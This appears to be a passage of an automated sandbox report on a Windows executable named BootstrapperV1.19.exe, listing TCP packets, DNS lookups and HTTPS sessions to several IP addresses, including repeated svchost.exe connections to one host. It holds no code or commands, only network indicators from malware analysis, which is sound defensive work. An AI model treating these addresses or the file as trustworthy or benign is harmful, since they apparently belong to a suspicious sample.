Sep 16, 2024 12:23:19.556747913 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:19.556827068 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:19.556977987 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:19.557005882 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.254081964 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.296432972 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.412409067 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.412437916 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.493438005 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.493467093 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670073032 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670152903 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670216084 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.682053089 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.682080984 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.682089090 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.682096004 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:22.754255056 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754329920 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:22.754558086 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754811049 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754849911 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.367235899 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.367764950 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.367841005 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.368294954 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.368314028 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624389887 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624480963 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624574900 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625205994 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625205994 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625245094 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.625271082 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:25.798193932 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798257113 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:25.798347950 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798579931 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798604965 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.436533928 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.437022924 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.437051058 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.438087940 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.438093901 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.697998047 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698084116 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698148012 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698529005 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698529005 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698553085 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698561907 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:28.814292908 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814333916 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:28.814445972 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814677954 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814702034 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.453011990 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.453510046 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.453525066 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.454332113 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.454336882 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.715936899 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.716011047 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.716196060 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.716999054 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.716999054 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.717016935 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.717026949 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:32.845005035 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845071077 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:32.845166922 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845415115 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845436096 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.461244106 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.461735010 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.461775064 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.462388992 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.462397099 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716103077 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716260910 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716320038 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716614008 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716629982 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716641903 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716650009 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:36.860688925 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.860738993 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:36.860930920 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.861130953 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.861143112 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.485217094 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.485790014 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.485814095 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.486848116 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.486855984 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.741959095 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742104053 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742337942 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742640018 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742654085 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742671013 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742676020 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:41.438843966 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.438900948 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:41.438988924 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.439153910 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.439172983 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.061265945 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.061747074 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.061779976 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.062557936 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.062563896 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319514990 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319688082 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319746971 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321116924 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321141005 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.321151018 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321156979 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:45.495415926 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495460033 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:45.495532036 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495697975 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495707989 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.200675964 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.222031116 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.222059965 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.223320007 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.223325014 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.457739115 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.457923889 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.458028078 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458561897 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458590031 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.458604097 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458611965 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:49.767363071 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767410994 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:49.767719030 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767719030 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767759085 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.385934114 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.386387110 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.386421919 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.387042046 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.387049913 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641518116 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641693115 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641801119 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.647775888 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.647804022 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:53.955796957 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.955830097 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:53.955905914 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.956084013 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.956096888 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.598381042 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.598870993 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.598891973 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.599617004 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.599625111 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859159946 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859344959 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859409094 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 16, 2024 12:22:23.275859118 CEST | 62065 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:23.283305883 CEST | 53 | 62065 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:27.094228983 CEST | 54109 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:27.101197004 CEST | 53 | 54109 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:27.934755087 CEST | 57648 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:27.981240034 CEST | 53 | 57648 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:28.006108046 CEST | 60794 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:28.014050961 CEST | 53 | 60794 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:30.835216045 CEST | 65441 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:30.842379093 CEST | 53 | 65441 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 16, 2024 12:22:23.275859118 CEST | 192.168.2.4 | 1.1.1.1 | 0x4411 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:27.094228983 CEST | 192.168.2.4 | 1.1.1.1 | 0x504a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:27.934755087 CEST | 192.168.2.4 | 1.1.1.1 | 0x4753 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:28.006108046 CEST | 192.168.2.4 | 1.1.1.1 | 0xd4f7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:30.835216045 CEST | 192.168.2.4 | 1.1.1.1 | 0x26e1 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | 104.21.93.27 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | 172.67.203.125 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 104.20.4.235 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 172.67.19.24 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 104.20.3.235 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.981240034 CEST | 1.1.1.1 | 192.168.2.4 | 0x4753 | No error (0) | 89.163.145.170 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | titanium.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4-lhr2.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | 128.116.119.3 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | 104.20.23.46 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | 104.20.22.46 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49731 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:24 UTC | 63 | OUT | |
2024-09-16 10:22:24 UTC | 577 | IN | |
2024-09-16 10:22:24 UTC | 792 | IN | |
2024-09-16 10:22:24 UTC | 1369 | IN | |
2024-09-16 10:22:24 UTC | 1369 | IN | |
2024-09-16 10:22:24 UTC | 872 | IN | |
2024-09-16 10:22:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49734 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:24 UTC | 151 | OUT | |
2024-09-16 10:22:25 UTC | 831 | IN | |
2024-09-16 10:22:25 UTC | 109 | IN | |
2024-09-16 10:22:25 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49737 | 104.20.4.235 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:27 UTC | 168 | OUT | |
2024-09-16 10:22:27 UTC | 398 | IN | |
2024-09-16 10:22:27 UTC | 562 | IN | |
2024-09-16 10:22:27 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49739 | 128.116.119.3 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:28 UTC | 213 | OUT | |
2024-09-16 10:22:29 UTC | 576 | IN | |
2024-09-16 10:22:29 UTC | 119 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49738 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:28 UTC | 137 | OUT | |
2024-09-16 10:22:28 UTC | 395 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49740 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:30 UTC | 209 | OUT | |
2024-09-16 10:22:30 UTC | 420 | IN | |
2024-09-16 10:22:30 UTC | 1120 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49741 | 104.20.23.46 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:31 UTC | 193 | OUT | |
2024-09-16 10:22:31 UTC | 497 | IN | |
2024-09-16 10:22:31 UTC | 20 | IN | |
2024-09-16 10:22:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49744 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:35 UTC | 212 | OUT | |
2024-09-16 10:22:35 UTC | 422 | IN | |
2024-09-16 10:22:35 UTC | 204 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49747 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:36 UTC | 212 | OUT | |
2024-09-16 10:22:36 UTC | 422 | IN | |
2024-09-16 10:22:36 UTC | 270 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49751 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:39 UTC | 212 | OUT | |
2024-09-16 10:22:39 UTC | 422 | IN | |
2024-09-16 10:22:39 UTC | 458 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49753 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:41 UTC | 212 | OUT | |
2024-09-16 10:22:41 UTC | 422 | IN | |
2024-09-16 10:22:41 UTC | 132 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.4 | 49756 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:44 UTC | 212 | OUT | |
2024-09-16 10:22:44 UTC | 422 | IN | |
2024-09-16 10:22:44 UTC | 527 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.4 | 49759 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:47 UTC | 212 | OUT | |
2024-09-16 10:22:48 UTC | 422 | IN | |
2024-09-16 10:22:48 UTC | 173 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.4 | 49760 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:50 UTC | 212 | OUT | |
2024-09-16 10:22:50 UTC | 422 | IN | |
2024-09-16 10:22:50 UTC | 589 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.4 | 49761 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:53 UTC | 212 | OUT | |
2024-09-16 10:22:53 UTC | 422 | IN | |
2024-09-16 10:22:53 UTC | 429 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.4 | 49762 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:55 UTC | 212 | OUT | |
2024-09-16 10:22:55 UTC | 422 | IN | |
2024-09-16 10:22:55 UTC | 286 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.4 | 49763 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:57 UTC | 212 | OUT | |
2024-09-16 10:22:57 UTC | 422 | IN | |
2024-09-16 10:22:57 UTC | 199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
